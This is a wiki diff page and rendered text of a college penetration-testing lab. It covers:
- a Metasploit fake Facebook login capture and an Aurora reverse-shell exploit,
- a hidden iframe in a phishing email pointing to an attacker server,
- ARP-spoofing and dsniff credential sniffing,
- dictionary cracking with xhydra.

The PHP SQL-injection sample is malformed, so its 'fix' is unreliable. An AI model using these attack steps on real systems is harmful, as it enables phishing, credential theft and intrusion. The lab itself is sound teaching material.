Difference between revisions of "SEC520/labs/Lab 4"
m (Protected "SEC520/labs/Lab 4": OER transfer ([Edit=Allow only administrators] (indefinite) [Move=Allow only administrators] (indefinite))) |
|||
(2 intermediate revisions by one other user not shown) | |||
Line 17: | Line 17: | ||
<h2> <span class="mw-headline">Objectives</span></h2> | <h2> <span class="mw-headline">Objectives</span></h2> | ||
<ol><li>Access a server by creating a webpage using the <b><iframe></b> tag to redirect a user to a <b>Metasploit exploit</b> in order to gain access to the computer system. | <ol><li>Access a server by creating a webpage using the <b><iframe></b> tag to redirect a user to a <b>Metasploit exploit</b> in order to gain access to the computer system. | ||
− | </li><li>Understand how <b>phishing</b> can be used to have the user inadvertantly activate (trigger) HTML code to access a vulnerable server via a web-browser. | + | </li><li>Understand how <b>phishing</b> can be used to have the user inadvertantly activate (trigger) HTML code to access a vulnerable server via a web-browser. |
− | </li><li>Perform <b>IP Spoofing</b> (Man in the Middle) attacks in order to obtain useful information between a connect between computers. | + | </li><li>Perform <b>IP Spoofing</b> (Man in the Middle) attacks in order to obtain useful information between a connect between computers. |
− | </li><li>Access and manipulate a database server to gain access into the targeted server. | + | </li><li>Access and manipulate a database server to gain access into the targeted server. |
− | </li><li>Use a <b>password cracking program</b> to discover and access user accounts, and possibly root access. | + | </li><li>Use a <b>password cracking program</b> to discover and access user accounts, and possibly root access. |
</li></ol> | </li></ol> | ||
<p><br> | <p><br> | ||
Line 26: | Line 26: | ||
<h2> <span class="mw-headline">Required Materials (Bring to All Labs)</span></h2> | <h2> <span class="mw-headline">Required Materials (Bring to All Labs)</span></h2> | ||
<ul> | <ul> | ||
− | <li> <b>SATA Hard Disk</b> (in removable disk tray). | + | <li> <b>SATA Hard Disk</b> (in removable disk tray). |
− | </li><li> <b>Lab Logbook (Lab6 Reference Sheet)</b> (to make notes and observations). | + | </li><li> <b>Lab Logbook (Lab6 Reference Sheet)</b> (to make notes and observations). |
− | </li></ul> | + | </li></ul> |
− | <p><br> | + | <p><br> |
− | </p> | + | </p> |
− | <h2> <span class="mw-headline">Prerequisites</span></h2> | + | <h2> <span class="mw-headline">Prerequisites</span></h2> |
− | <ul><li> [https://wiki.cdot.senecacollege.ca/wiki/SEC520/labs/Lab_3 SEC520 Lab 3] | + | <ul><li> [https://wiki.cdot.senecacollege.ca/wiki/SEC520/labs/Lab_3 SEC520 Lab 3] |
− | </li></ul> | + | </li></ul> |
− | <p><br> | + | <p><br> |
− | </p> | + | </p> |
− | <h2> <span class="mw-headline">Online Tools and References</span></h2> | + | <h2> <span class="mw-headline">Online Tools and References</span></h2> |
− | + | ||
− | <ul> | + | <ul> |
− | <li>[http://www.ehacking.net/2011/10/metasploit-tutorials-from-beginner-to.html Metasploit Framework]</li> | + | <li>[http://www.ehacking.net/2011/10/metasploit-tutorials-from-beginner-to.html Metasploit Framework]</li> |
− | + | <li>[http://www.irongeek.com/i.php?page=security/arpspoof arpspoof]</li> | |
− | + | <li>[http://arhodes505.awardspace.us/minituts/xhydra.htm xhydra]</li> | |
− | + | </ul> | |
− | </ul> | + | |
− | + | <p><br> | |
− | <p><br> | + | </p> |
− | </p> | + | <h2> <span class="mw-headline">Course Notes</span></h2> |
− | <h2> <span class="mw-headline">Course Notes</span></h2> | + | <ul> |
− | <ul> | + | <li>[http://cs.senecac.on.ca/%7Efac/sec520/slides/sec520_w7_l1.odp odp] | [http://cs.senecac.on.ca/%7Efac/sec520/slides/sec520_w7_l1.pdf pdf] | [http://cs.senecac.on.ca/%7Efac/sec520/slides/sec520_w7_l1.ppt ppt] (Slides: Types of Attacks)</li> |
− | + | <li>[http://www.youtube.com/watch?v=ZUygX8TBBw0 Phishing] | [http://www.youtube.com/watch?v=PqfZM3Lxrmg Malicious Payload] | [http://www.youtube.com/watch?v=-hd7XG-b6uk IP Spoofing] | [http://www.youtube.com/watch?v=AhTfo6pWBIM Database Injection] (YouTube Videos)</li> | |
− | + | ||
− | + | </ul> | |
− | + | ||
− | </ul> | + | <p><br> |
− | + | </p> | |
− | <p><br> | + | <h1> <span class="mw-headline">Performing Lab 4</span></h1> |
− | </p> | + | <br> |
− | <h1> <span class="mw-headline">Performing Lab 4</span></h1> | + | {{Admon/caution|CAUTION!|Scanning ports and exploiting servers must |
− | <br> | + | require the permission of Server Owner (preferably in writing). Students |
− | {{Admon/caution|CAUTION!|Scanning ports and exploiting servers must | + | must either use their VMs, use the IFS lab (if available), or sign an agreement to use the <b>Tank</b> server when practising these computer system intrusion methods.|}} |
− | require the permission of Server Owner (preferably in writing). Students | + | <br> |
− | must either use their VMs, use the IFS lab (if available), or sign an agreement to use the <b>Tank</b> server when practising these computer system intrusion methods.|}} | + | |
− | <br> | + | <h2> <span class="mw-headline">Task #1: Web-browser Redirect (Phishing) Attacks</span></h2> |
− | + | <br> | |
− | <h2> <span class="mw-headline">Task #1: Web-browser Redirect (Phishing) Attacks</span></h2> | + | This section will demonstrate the vulnerability of a computer system |
− | <br> | + | with one of its weakest links: <i>Humans</i>. You will be using the <b>Metasploit</b> framework to create an attack on your server that will <i>exploit</i> and <i>gain access</i> to your target machine. You will also learn how you can redirect users to this attack site to deliver the malicious payload to that targeted computer. |
− | This section will demonstrate the vulnerability of a computer system | + | <br> |
− | with one of its weakest links: <i>Humans</i>. You will be using the <b>Metasploit</b> framework to create an attack on your server that will <i>exploit</i> and <i>gain access</i> to your target machine. You will also learn how you can redirect users to this attack site to deliver the malicious payload to that targeted computer. | + | INSTRUCTIONS: |
− | <br> | + | <br /><br /> |
− | INSTRUCTIONS: | + | Metasploit is a very versatile tool for penetration testing. In addition to gaining access to "targeted" computer systems by using the <b>Armitage</b> frontend, other strategies such as <i>lurking</i> to gain access (via reverse shell) by redirecting web-browser traffic are also available. |
− | <br /><br /> | + | <br /><br /> |
− | Metasploit is a very versatile tool for penetration testing. In addition to gaining access to "targeted" computer systems by using the <b>Armitage</b> frontend, other strategies such as <i>lurking</i> to gain access (via reverse shell) by redirecting web-browser traffic are also available. | + | In this section, we will be using the mfs-console to issue commands to exploit via the web-browser. Before we start, we should update our Metasploit Framework. In order to achieve this, we will update the older version of Metasploit that came with our Kali Linux edition with a new version: |
− | <br /><br /> | + | <br /><br /> |
− | In this section, we will be using the mfs-console to issue commands to exploit via the web-browser. Before we start, we should update our Metasploit Framework. In order to achieve this, we will update the older version of Metasploit that came with our Kali Linux edition with a new version: | + | {{Admon/tip|Using The MSF Console| |
− | <br /><br /> | + | <b>msfconsole</b> is a shell that allows penetration testers to issue commands when working with Metasploit. For example, IFS students in the degree program are expected to perform penetration testing more in the msfconsole than using Metasploit GUIs like Armatage!<br /><br /> |
− | {{Admon/tip|Using The MSF Console| | + | We will be running the <b>msfconsole</b> command to access the command shell, and setup a typical phishing attack. |
− | <b>msfconsole</b> is a shell that allows penetration testers to issue commands when working with Metasploit. For example, IFS students in the degree program are expected to perform penetration testing more in the msfconsole than using Metasploit GUIs like Armatage!<br /><br /> | + | |}} |
− | We will be running the <b>msfconsole</b> command to access the command shell, and setup a typical phishing attack. | + | <br /> |
− | |}} | + | <ol> |
− | <br /> | + | <li>Login as <b>root</b> user, and issue the command: <b>msfconsole</b> (ignore error, console should eventually load). If problems persist check to see if the Metasploit server is running.<br> |
− | <ol> | + | Next, we will be generating an attack payload (code) that can be executed from an html file (via a form button) to gain access to the computer system. Perform the following steps to create this payload (html) file: |
− | + | <br /></li> | |
− | Next, we will be generating an attack payload (code) that can be executed from an html file (via a form button) to gain access to the computer system. Perform the following steps to create this payload (html) file: | + | <li>In the <b>msfconsole</b>, issue the following commands: |
− | <br /></li> | + | <br /></li> |
− | + | </ol> | |
− | + | <pre> | |
− | </ol> | + | use auxiliary/server/capture/http_basic |
− | + | show options | |
− | + | set REALM Facebook Gateway | |
− | + | set URIPATH / | |
− | + | run | |
− | + | </pre> | |
− | + | <ol> | |
− | + | <li value="3">Note the <b>LOCAL IP ADDRESS</b>. You will be entering that address in a web-browser on your targeted Windows server.</li> | |
− | <ol> | + | </li><li>Your attack server (running Metasploit) is now "lurking" until the user enters data in a windows dialog box.</li> |
− | |||
− | |||
</ol> | </ol> | ||
{{Admon/important|Disable Internet Explorer Enhanced Security| | {{Admon/important|Disable Internet Explorer Enhanced Security| | ||
Line 103: | Line 101: | ||
<ol> | <ol> | ||
− | + | <li value="5">Switch to your vulnerable Windows server, make certain that you are logged in as <b>Administrator</b>.</li> | |
− | + | <li>Open the <b>Control Panel</b>, select <b>Add or Remove Programs</b>, select <b>Add/Remove Windows Components</b>. Click to select <b>Internet Explorer Enhanced Security Configuration</b> and click <b>Details</b>. Unclick the checkboxes for admin and all other users and then click <b>Next</b>.</li> | |
− | + | <li>Login into a regular user account and open a web-browser.</li> | |
− | + | <li>Enter the IP ADDRESS for the attack web-site. Enter a username and password when prompted by the dialog box</li> | |
− | + | <li>Now, switch to your attack machine (i.e. host), and you should see a notification of the exploit. Where you able to determine the username and password?</li> | |
− | + | <li>Did you think it would be harder to exploit a machine in this way?</li> | |
− | + | <li>How popular do you think this type of human-based attack is?</li> | |
− | + | <li>How can you prevent this type of attack from occurring on a "hardened system"?</li> | |
− | + | <li>Record your findings in your lab log-book.</li> | |
</ol> | </ol> | ||
<br /><br /> | <br /><br /> | ||
Line 118: | Line 116: | ||
Here is how simple (subtle) it can be:<br /><br /> | Here is how simple (subtle) it can be:<br /><br /> | ||
<ol> | <ol> | ||
− | + | <li>Perform a Google search to use msfconsole to setup a "reverse shell attack" by entering the console commands:<ul><li>use windows/browser/ms10_002_aurora</li><li>set generic/shell_reverse tcp</li><li>set LHOST (your attack host IP ADDRESS)</li><li>set URIPATH /</li><li>set LPORT 7371</li><li>set SRVPORT 80</li><li>exploit</li></ul></li><li>Create a "phony" facebook notification for the "targeted" user on the system (this is where the reconnaissance (information gathering) phase comes in handy such as e-mail usernames and facebook accounts.</li> | |
− | <li>Here is a link to sample HTML code: [https://scs.senecac.on.ca/%7Efac/sec520/labs/email-attachment-template.html.txt Template of e-mail attachment]</li> | + | <li>Here is a link to sample HTML code: [https://scs.senecac.on.ca/%7Efac/sec520/labs/email-attachment-template.html.txt Template of e-mail attachment]</li> |
− | <li>Edit the file to contain the following iframe (that will draw the user to your attack website):<br><br> | + | <li>Edit the file to contain the following iframe (that will draw the user to your attack website):<br><br> |
− | + | <pre> <iframe src="ATTACK_SERVER_IP_ADDRESS" width="100" height="0"> </iframe> | |
− | + | </pre></li> | |
− | <li>We could then send this HTML file via an e-mail to the user (in this case masquerading as a facebook notification. You could simulate this attack for demonstration by creating the html file in your Windows server, and load this file with a web-browser (like Internet Explorer).<br /><br />Another approach would be to send a "phony" notification with links to the facebook "login" page with the <iframe> element.</li> | + | <li>We could then send this HTML file via an e-mail to the user (in this case masquerading as a facebook notification. You could simulate this attack for demonstration by creating the html file in your Windows server, and load this file with a web-browser (like Internet Explorer).<br /><br />Another approach would be to send a "phony" notification with links to the facebook "login" page with the <iframe> element.</li> |
</ol> | </ol> | ||
|}} | |}} | ||
<ol> | <ol> | ||
− | <br /> | + | <br /> |
− | + | <li value="14">Proceed to Task #2</li> | |
− | + | </ol> | |
<p><b>Answer the Task #1 observations / questions in your lab log book.</b> | <p><b>Answer the Task #1 observations / questions in your lab log book.</b> | ||
</p> | </p> | ||
Line 136: | Line 134: | ||
<p><br> | <p><br> | ||
− | This section will demonstrate an <b>IP Spoofing</b> attack (sometimes | + | This section will demonstrate an <b>IP Spoofing</b> attack (sometimes |
− | referred to as <i>"arp poisoning"</i>) where the target server is "tricked" | + | referred to as <i>"arp poisoning"</i>) where the target server is "tricked" |
− | into communicating with a server that assumes has the correct MAC | + | into communicating with a server that assumes has the correct MAC |
− | address. The attacker can then <b>"feed packets"</b> to the destination allowing for an uninterupted session to obtain information such as usernames and passwords. | + | address. The attacker can then <b>"feed packets"</b> to the destination allowing for an uninterupted session to obtain information such as usernames and passwords. |
− | <br><br> | + | <br><br> |
− | INSTRUCTIONS: | + | INSTRUCTIONS: |
− | </p><ol> | + | </p><ol> |
− | + | <li>We will be using your <b>Kali Linux</b> host machine, <b>Vulnerable Windows VM</b>, and <b>Vulnerable Linux VM</b> for this section.</li> | |
− | + | <li>Note the IP Address of your Windows server. | |
− | + | </li><li>Make certain that your Windows machine is running an FTP | |
− | server. Set up the FTP server to only allow users to access the FTP | + | server. Set up the FTP server to only allow users to access the FTP |
− | server by username and password (possibly not required from default installation and startup).</li> | + | server by username and password (possibly not required from default installation and startup).</li> |
− | + | <li>For demonstration purposes of this "man in the middle" attack, open a command prompt, and issue the following MS-Windows command: <b>ping LINUX_IP_ADDR -t</b><br /><br />You should now see proof of a connection between your vulnerable Windows and Linux servers.</li> | |
− | + | <li>Switch to your vulnerable Linux server, open a shell terminal, and note the IP Address of your vulnerable Linux server.</li> | |
− | + | <li>Open another shell terminal, and issue the following Linux command to continuously "ping" the Windows server: <b>ping WINDOWS_IP_ADDR</b></li> | |
− | + | <li>We will now trick the Windows server into thinking that the attack (Kali Linux or "host") server is the destination server.</li> | |
− | + | <li>Switch to your Kali Linux (host) server, and open a shell terminal.</li> | |
− | + | <li>While in the host (attack) machine, issue the following Linux command:<br /><br /> <b>sudo arpspoof -t WINDOWS_IP_ADDR LINUX_IP_ADDR</b><br><br> </li> | |
− | + | <li>We need to continue the "man in the middle" attack by now | |
− | performing the same manuever for the Linux VM. While still in the host (attack) machine, open another shell terminal and issue the following | + | performing the same manuever for the Linux VM. While still in the host (attack) machine, open another shell terminal and issue the following |
− | Linux command: <br><br><b>sudo arpspoof -t LINUX_IP_ADDR_LINUX WINDOWS_IP_ADDR</b><br><br></li> | + | Linux command: <br><br><b>sudo arpspoof -t LINUX_IP_ADDR_LINUX WINDOWS_IP_ADDR</b><br><br></li> |
− | + | <li>Switch to first your vulnerable Windows machine to view the pings. What do you notice? Do the same for your vulnerable Linux machine. Record your findings in your lab log-book.<br /><br /></li> | |
</ol> | </ol> | ||
Line 165: | Line 163: | ||
<br> | <br> | ||
<ol> | <ol> | ||
− | + | <li value="12">To complete the "man in the middle" attack, you are required to establish <b>IP FORWARDING</b>. Open another shell window in your host (attack) machine, and issue the following Linux command in your attack host:<br><br><b>sudo su</b> # login with admin passord<br /><b> echo 1 > /proc/sys/net/ipv4/ip_forward</b><br><br>(This means to set IP FORWARDING to "True" or "On")<br><br></li> | |
− | + | <li>Switch to your vulnerable Windows and Linux machines. Is the connection (using the ping command) re-established? Record your findings in your lab log-book.<br /><br /></li> | |
</ol> | </ol> | ||
{{Admon/important|Obtaining Username / Password Information|One of the main reasons for a <b>"man in the middle" attack</b> is to obtain sensitive information such as a username and password for further exploitation. A <b>Packet Sniffer</b> is a useful tool when using a "man in the middle attack". Throughout your journey in the area of Internet Security, you will soon learn there | {{Admon/important|Obtaining Username / Password Information|One of the main reasons for a <b>"man in the middle" attack</b> is to obtain sensitive information such as a username and password for further exploitation. A <b>Packet Sniffer</b> is a useful tool when using a "man in the middle attack". Throughout your journey in the area of Internet Security, you will soon learn there | ||
− | + | is an ambundence of tools, many of which do the same thing (including packet sniffers). For the remainder of this section we will use a packet sniffer tool called <b>dsniff</b>.|}} | |
<br> | <br> | ||
<ol> | <ol> | ||
− | + | <li value="14">On an available shell terminal on your host (attack) server, and issue the following Linux command: <b>dsniff</b><br />(<b>tip:</b> Use the command: <b>find -P . | grep dsniff</b> to locate dsniff superuser executable)</li> | |
− | + | <li>This packet sniffer program will lurk until a user from the Linux VM establishes a connection with the Windows VM FTP SERVER.</li> | |
− | + | <li>Switch to your vulnerable Linux server, and establish an FTP connection with the Windows FTP server.</li> | |
</ol> | </ol> | ||
{{Admon/important|FTP Doesn't Work / Alternative Arp Posioning Method| | {{Admon/important|FTP Doesn't Work / Alternative Arp Posioning Method| | ||
Line 186: | Line 184: | ||
<ol> | <ol> | ||
− | + | <li value="17">Then switch back to your host (attack) server.</li> | |
− | + | <li>What do you notice? Is this information sufficent to logon as a Windows system user? Record your findings in your lab log-book.</li> | |
− | + | <li>Return to your vulnerable Linux server, and close the FTP connection with the Windows server.</li> | |
− | + | <li>Switch back to your attack server. What information does <b>dsniff</b> provide?</li> | |
− | + | <li>What steps would a security analyst implement in order to reduce the possibility of a "man in the middle" attack?</li> | |
− | + | <li>Record your findings/answers in your lab log-book.</li> | |
− | <li>Proceed to Task #3</li> | + | <li>Proceed to Task #3</li> |
− | + | </ol> | |
<p><b>Answer Task #2 observations / questions in your lab log book.</b> | <p><b>Answer Task #2 observations / questions in your lab log book.</b> | ||
− | </p><p><br> | + | </p><p><br> |
</p> | </p> | ||
Line 210: | Line 208: | ||
INSTRUCTIONS: | INSTRUCTIONS: | ||
<ol> | <ol> | ||
− | + | <li>Study the following PHP code below: </li> | |
</ol> | </ol> | ||
<pre> <?php | <pre> <?php | ||
− | + | ||
− | + | $user = $_POST['usr']; | |
− | + | ||
− | + | $user = "anything' OR x='x"; | |
− | + | ||
− | + | mysql_query("SELECT user,password FROM users WHERE user ' 'anything' or x='x'"); | |
− | + | ||
− | + | ?> | |
− | + | ||
</pre> | </pre> | ||
<br> | <br> | ||
<ol> | <ol> | ||
− | + | <li value="2">How could this code be incorporated with an HTML document (using a form) to perform a <b>database injection</b> attack? Record your answer in your lab log-book.</li> | |
− | + | <li>View the associated <b>YouTube</b> video in the resources above, and try briefly explained why this type of attack could work. Write your explanation in your lab log-book.</li> | |
− | + | <li>Now, make the following editing changes to your saved database form (areas to be changed are displayed in bold, red colour:</li> | |
</ol> | </ol> | ||
<pre> <?php | <pre> <?php | ||
− | + | ||
− | + | $user = <span style="color:red;font-weight:bold">mysql_real_escape_string(</span>$_POST['usr']<span style="color:red;font-weight:bold">)</span>; | |
− | + | ||
− | + | $user = "anything' OR x='x"; | |
− | + | ||
− | + | mysql_query("SELECT user,password FROM users WHERE user ' 'anything' or x='x'"); | |
− | + | ||
− | + | ?> | |
− | + | ||
</pre> | </pre> | ||
<ol> | <ol> | ||
− | + | <li value="5">Try to explain how this last editing session prevented this SQL injection attack. Record your observations/answers in your lab log-book.</li> | |
− | + | <li>Proceed to Task #4.</li> | |
</ol> | </ol> | ||
<p><b>Answer Task #3 observations / questions in your lab log book.</b> | <p><b>Answer Task #3 observations / questions in your lab log book.</b> | ||
− | </p><p><br> | + | </p><p><br> |
</p> | </p> | ||
Line 262: | Line 260: | ||
INSTRUCTIONS: | INSTRUCTIONS: | ||
<ol> | <ol> | ||
− | + | <li>Go to your vulnerable Windows server, create a username called <b>weak</b> that contains a very weak password (no special characters, just words that could be contained in a dictionary).</li> | |
− | + | <li>How could you obtain usernames (eg. e-mail usernames) for a targetted computer system? (review your labs and notes during the Reconnaissance Phase). Record your answer in your lab log-book.</li> | |
− | + | <li>Assuming that you have obtained a username (i.e. username: <b>weak</b>) from the reconnaissance phase. We will now be using a tool to gain access to the account on the targeted Windows server.<br /><br /></li> | |
− | + | ||
− | {{Admon/important|Cain Password Dictionary|A password cracking program requires a dictionary of common passwords. The file <b>cain.txt</b> is a popular dictionary of typical or common passwords that can be used to test for weak passwords on a server.|}} | + | {{Admon/important|Cain Password Dictionary|A password cracking program requires a dictionary of common passwords. The file <b>cain.txt</b> is a popular dictionary of typical or common passwords that can be used to test for weak passwords on a server.|}} |
− | <br> | + | <br> |
+ | <li value="4">We need to download a dictionary file containing many of the weak password combinations to help crack a user's weak password. You can perform a Netsearch in order to save this dictionary as a text file.<br /><br />Here is a link to various password cracking dictionaries: [http://www.skullsecurity.org/wiki/index.php/Passwords http://www.skullsecurity.org/wiki/index.php/Passwords]<br /><br />As root, download the compressed file (cain.txt.bz2) to your <b>/root</b> directory.<br /><br /></li> | ||
+ | <li>Decompress the file by issuing the following Linux command: <b>bunzip2 cain.txt.bz2</b><br /><br /></li> | ||
+ | {{Admon/important|xhydra|xhydra is a graphical frontend of a program | ||
+ | that scans open ports, and attempts to crack account passwords that are | ||
+ | weak using a dictionary file of potential passwords. Of course, you | ||
+ | could have performed this task manually by using <b>nmap</b> to scan open ports, and use other password cracking tools (such as <b>Cain and Able</b>), but <b>xhydra</b> performs these operations automatically.|}} | ||
+ | <br> | ||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | + | <li value="6">To launch the xhydra application as root (unless you are already in root), issue the following Linux command: <b>sudo xhydra</b><br /><br /></li> | |
− | + | <li>In the initial application window (ie. <b>Target</b> tab), enter the <b>WINDOWS_IP_ADDR</b> in the <b>Target</b> textbox.</li> | |
− | + | <li>Under the <b>Protocol</b> list-box, select <b>ftp</b>.</li> | |
− | + | <li>In the <b>Output Options</b> section, check <b>Be verbose</b>, and check <b>Show Attempts</b>.</li> | |
− | + | <li>Move to the next screen by clicking on the <b>Passwords</b> tab.</li> | |
− | + | <li>In the <b>Username</b> section, type the username called <b>weak</b>.</li> | |
− | + | <li>In the <b>Password</b> section, click on the <b>passwords list</b> radio button, and then click on the <b>passwords list text-box</b> in order to browse to the <b>/root/cain.txt</b> dictionary (on your Kali Linux system) that contains common passwords that you downloaded and decompressed.</li> | |
− | + | <li>At the bottom of the screen, check <b>Try login as password</b>, and click <b>Try Empty Password</b>.</li> | |
− | + | <li>Click on the <b>Start</b> tab, and click on the <b>Start</b> button (at the bottom of the screen) to begin the attack.</li> | |
− | + | <li>This attack may take several minutes to complete.</li> | |
− | + | <li>Check the output from the Password Cracking Attempt. Did it list any usernames and passwords? If so, record the information in your lab log-book.<br><br></li> | |
− | |||
− | any usernames and passwords? If so, record the information in your lab | ||
− | log-book.<br><br></li | ||
− | |||
{{Admon/important|Gaining Root Access|Once a penetration tester has access to a system as an unpriviledged user, there are methods to try to identify and gain access to an administrative account.<br /><br /> | {{Admon/important|Gaining Root Access|Once a penetration tester has access to a system as an unpriviledged user, there are methods to try to identify and gain access to an administrative account.<br /><br /> | ||
For example with Linux systems, gaining access to the <b>/etc/passwd</b> file to list users with administrative privedges and gaining access to the <b>/etc/shadow</b> to attempt a crack the root password hash (via the <b>John the Ripper</b> utility). | For example with Linux systems, gaining access to the <b>/etc/passwd</b> file to list users with administrative privedges and gaining access to the <b>/etc/shadow</b> to attempt a crack the root password hash (via the <b>John the Ripper</b> utility). | ||
|}} | |}} | ||
<br> | <br> | ||
− | + | <li value="17">What sort of harm can be done to this organization if the <b>root</b> account has been hacked?</li> | |
− | + | <li>What sort of password rules should be used to make it harder to penetrate this system?</li> | |
− | + | ||
− | |||
<br /> | <br /> | ||
{{Admon/important|Sharpening Your Skills (hackthissite.org)| | {{Admon/important|Sharpening Your Skills (hackthissite.org)| | ||
Line 312: | Line 303: | ||
|}} | |}} | ||
<br /> | <br /> | ||
− | + | ||
− | + | <li value="19">Record your findings in your lab log-book.</li> | |
− | + | <li>Proceed to the "Completing the Lab".</li> | |
− | |||
</ol> | </ol> | ||
<p><b>Answer Task #4 observations / questions in your lab log book.</b> | <p><b>Answer Task #4 observations / questions in your lab log book.</b> | ||
− | </p><p><br> | + | </p><p><br> |
</p> | </p> | ||
Line 327: | Line 317: | ||
</p> | </p> | ||
<ol> | <ol> | ||
− | + | <li>Proof of <b>Windows VM hack from Phishing / Malicious Code</b>.</li> | |
− | + | <li><b>Packet Sniffing</b> information from Linux to Windows FTP connection.</li> | |
− | + | <li>Demonstation of <b>prevention from Data Injection Attack</b>.</li> | |
− | + | <li>Completed Lab 4 notes.</li> | |
</ol> | </ol> | ||
<p><br> | <p><br> | ||
Line 337: | Line 327: | ||
<ol> | <ol> | ||
− | + | <li>Briefly explain the purpose of a <b>Phishing</b> Attack. How can phishing relate to using <b>malicious code</b>?</li> | |
− | + | <li>Define the term <b>Man in the Middle</b> attack.</li> | |
− | + | <li>Briefly list the steps in a <b>Database Injection</b> attack.</li> | |
− | + | <li>How can a <b>dictionary file</b> be used to crack passwords on a targeted server?</li> | |
− | + | <li>What is a <b>password hash</b>? How can a <i>password hash</i> be cracked?</li> | |
− | + | <li>What can an organization do to prevent passwords on their computer system from being cracked?</li> | |
</ol> | </ol> |
Latest revision as of 15:00, 21 July 2023
Types of Attacks
Introduction
In the previous lab, you learned how to perform penetration testing on a vulnerable (target) server. You learned how to perform scanning and enumeration, and then ran vulnerability testing software (eg. Metasploit) to gain access to your Windows server.
In this lab, students will learn other methods of vulnerability testing to gain access to vulnerable servers:
- This lab will allow students to identify and practice common types of attacks that occur on targeted computer systems.
- First, students will be exposed to Client-side attacks (usually initiated by the server's users) including Malicious web-page Payloads, and IP Spoofing (Man in the Middle) attacks.
- Then, students will focus on Server-side attacks such as Server-side Injection, and Password attacks.
Objectives
- Access a server by creating a webpage using the <iframe> tag to redirect a user to a Metasploit exploit in order to gain access to the computer system.
- Understand how phishing can be used to have the user inadvertantly activate (trigger) HTML code to access a vulnerable server via a web-browser.
- Perform IP Spoofing (Man in the Middle) attacks in order to obtain useful information between a connect between computers.
- Access and manipulate a database server to gain access into the targeted server.
- Use a password cracking program to discover and access user accounts, and possibly root access.
Required Materials (Bring to All Labs)
- SATA Hard Disk (in removable disk tray).
- Lab Logbook (Lab6 Reference Sheet) (to make notes and observations).
Prerequisites
Online Tools and References
Course Notes
- odp | pdf | ppt (Slides: Types of Attacks)
- Phishing | Malicious Payload | IP Spoofing | Database Injection (YouTube Videos)
Performing Lab 4
Task #1: Web-browser Redirect (Phishing) Attacks
This section will demonstrate the vulnerability of a computer system
with one of its weakest links: Humans. You will be using the Metasploit framework to create an attack on your server that will exploit and gain access to your target machine. You will also learn how you can redirect users to this attack site to deliver the malicious payload to that targeted computer.
INSTRUCTIONS:
Metasploit is a very versatile tool for penetration testing. In addition to gaining access to "targeted" computer systems by using the Armitage frontend, other strategies such as lurking to gain access (via reverse shell) by redirecting web-browser traffic are also available.
In this section, we will be using the mfs-console to issue commands to exploit via the web-browser. Before we start, we should update our Metasploit Framework. In order to achieve this, we will update the older version of Metasploit that came with our Kali Linux edition with a new version:
- Login as root user, and issue the command: msfconsole (ignore error, console should eventually load). If problems persist check to see if the Metasploit server is running.
Next, we will be generating an attack payload (code) that can be executed from an html file (via a form button) to gain access to the computer system. Perform the following steps to create this payload (html) file: - In the msfconsole, issue the following commands:
use auxiliary/server/capture/http_basic show options set REALM Facebook Gateway set URIPATH / run
- Note the LOCAL IP ADDRESS. You will be entering that address in a web-browser on your targeted Windows server.
- Your attack server (running Metasploit) is now "lurking" until the user enters data in a windows dialog box.
- Switch to your vulnerable Windows server, make certain that you are logged in as Administrator.
- Open the Control Panel, select Add or Remove Programs, select Add/Remove Windows Components. Click to select Internet Explorer Enhanced Security Configuration and click Details. Unclick the checkboxes for admin and all other users and then click Next.
- Login into a regular user account and open a web-browser.
- Enter the IP ADDRESS for the attack web-site. Enter a username and password when prompted by the dialog box
- Now, switch to your attack machine (i.e. host), and you should see a notification of the exploit. Where you able to determine the username and password?
- Did you think it would be harder to exploit a machine in this way?
- How popular do you think this type of human-based attack is?
- How can you prevent this type of attack from occurring on a "hardened system"?
- Record your findings in your lab log-book.
- Proceed to Task #2
Answer the Task #1 observations / questions in your lab log book.
Task #2: IP Spoofing (Man in the Middle) Attacks / Packet Sniffing
This section will demonstrate an IP Spoofing attack (sometimes
referred to as "arp poisoning") where the target server is "tricked"
into communicating with a server that assumes has the correct MAC
address. The attacker can then "feed packets" to the destination allowing for an uninterupted session to obtain information such as usernames and passwords.
INSTRUCTIONS:
- We will be using your Kali Linux host machine, Vulnerable Windows VM, and Vulnerable Linux VM for this section.
- Note the IP Address of your Windows server.
- Make certain that your Windows machine is running an FTP
server. Set up the FTP server to only allow users to access the FTP
server by username and password (possibly not required from default installation and startup). - For demonstration purposes of this "man in the middle" attack, open a command prompt, and issue the following MS-Windows command: ping LINUX_IP_ADDR -t
You should now see proof of a connection between your vulnerable Windows and Linux servers. - Switch to your vulnerable Linux server, open a shell terminal, and note the IP Address of your vulnerable Linux server.
- Open another shell terminal, and issue the following Linux command to continuously "ping" the Windows server: ping WINDOWS_IP_ADDR
- We will now trick the Windows server into thinking that the attack (Kali Linux or "host") server is the destination server.
- Switch to your Kali Linux (host) server, and open a shell terminal.
- While in the host (attack) machine, issue the following Linux command:
sudo arpspoof -t WINDOWS_IP_ADDR LINUX_IP_ADDR
- We need to continue the "man in the middle" attack by now
performing the same manuever for the Linux VM. While still in the host (attack) machine, open another shell terminal and issue the following
Linux command:
sudo arpspoof -t LINUX_IP_ADDR_LINUX WINDOWS_IP_ADDR - Switch to first your vulnerable Windows machine to view the pings. What do you notice? Do the same for your vulnerable Linux machine. Record your findings in your lab log-book.
- To complete the "man in the middle" attack, you are required to establish IP FORWARDING. Open another shell window in your host (attack) machine, and issue the following Linux command in your attack host:
sudo su # login with admin passord
echo 1 > /proc/sys/net/ipv4/ip_forward
(This means to set IP FORWARDING to "True" or "On") - Switch to your vulnerable Windows and Linux machines. Is the connection (using the ping command) re-established? Record your findings in your lab log-book.
- On an available shell terminal on your host (attack) server, and issue the following Linux command: dsniff
(tip: Use the command: find -P . | grep dsniff to locate dsniff superuser executable) - This packet sniffer program will lurk until a user from the Linux VM establishes a connection with the Windows VM FTP SERVER.
- Switch to your vulnerable Linux server, and establish an FTP connection with the Windows FTP server.
- Then switch back to your host (attack) server.
- What do you notice? Is this information sufficent to logon as a Windows system user? Record your findings in your lab log-book.
- Return to your vulnerable Linux server, and close the FTP connection with the Windows server.
- Switch back to your attack server. What information does dsniff provide?
- What steps would a security analyst implement in order to reduce the possibility of a "man in the middle" attack?
- Record your findings/answers in your lab log-book.
- Proceed to Task #3
Answer Task #2 observations / questions in your lab log book.
Task #3: Database Injection Attack
